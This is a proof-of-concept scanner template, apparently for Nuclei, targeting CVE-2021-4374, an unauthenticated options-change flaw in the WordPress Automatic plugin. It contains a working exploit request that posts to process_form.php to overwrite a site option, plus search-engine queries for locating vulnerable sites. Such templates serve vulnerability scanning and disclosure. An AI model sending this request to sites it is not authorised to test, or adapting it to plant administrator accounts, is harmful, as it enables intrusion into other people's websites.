WordPress Automatic Plugin (versions 3.53.2 and below) contains a critical vulnerability that allows unauthenticated users to change arbitrary WordPress options through the process_form.php script. The vulnerable script uses update_option() on all POST parameters without authentication or capability checks, allowing attackers to create administrator accounts or modify critical settings. The vulnerability can be exploited even if the plugin is deactivated as it's a standalone script.
PoC代码[已公开]
id: CVE-2021-4374
info:
name: WordPress Automatic Plugin - Unauthenticated Options Change
author: intelligent-ears
severity: critical
description: |
WordPress Automatic Plugin (versions 3.53.2 and below) contains a critical vulnerability that allows unauthenticated users to change arbitrary WordPress options through the process_form.php script. The vulnerable script uses update_option() on all POST parameters without authentication or capability checks, allowing attackers to create administrator accounts or modify critical settings. The vulnerability can be exploited even if the plugin is deactivated as it's a standalone script.
reference:
- "https://www.wordfence.com/blog/2021/09/critical-vulnerability-fixed-in-wordpress-automatic-plugin/"
- "https://nvd.nist.gov/vuln/detail/CVE-2021-4374"
classification:
cve-id: CVE-2021-4374
epss-score: 0.57016
epss-percentile: 0.98022
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cwe-id: CWE-862
cpe: cpe:2.3:a:valvepress:wordpress_automatic_plugin:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
max-request: 2
vendor: valvepress
product: wp-automatic
fofa-query: "wp-content/plugins/wp-automatic/"
google-query: inurl:"/wp-content/plugins/wp-automatic/"
shodan-query: 'http.html:"wp-content/plugins/wp-automatic/"'
tags: cve,cve2021,wp,wordpress,wp-plugin,wp-automatic,unauth,intrusive,vkev
http:
- raw:
- |
POST /wp-content/plugins/wp-automatic/process_form.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
field1={{randstr}}&field3=test&field4=test&field5=test&field6=test&blogdescription={{randstr}}
- |
GET / HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: body_2
words:
- '{{randstr}}'
- type: status
status:
- 200
# digest: 490a004630440220704ba4d5618b3aba2cc6d75e53e9def07bcda9dadea1c2b3f2d43fa9a8ba367b02203c13309cb8eb51fe652dbdb54aabedfce5ec818aa991c55e1d6d7ad74b9837ce:922c64590222798bb761d5b6d8e72950